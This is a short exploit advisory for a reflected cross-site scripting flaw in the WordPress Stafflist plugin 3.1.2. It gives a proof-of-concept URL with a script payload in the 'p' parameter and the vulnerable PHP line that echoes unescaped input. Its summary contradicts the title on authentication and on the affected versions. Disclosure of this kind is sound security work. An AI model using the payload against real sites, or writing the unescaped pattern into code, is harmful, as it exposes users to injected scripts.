WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.
74269ba0f910606e9499b4b87b6ba8ea243f907c7743fde42c4af10707d6f9da
# Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com
# Summary:
A cross site scripting reflected vulnerability has been identified in
WordPress Plugin stafflist version less then 3.1.2. that allows
unauthenticated users to run arbitrary javascript code inside
WordPress using Stafflist Plugin.
# POC
http://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
# Vulnerable Parameters
p and s parameters are vulnerable.
# Vulnerable Code:
$html = ($cur > 1 ? "<p class='pager'><a
href='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous
</a></p>" : ""); //<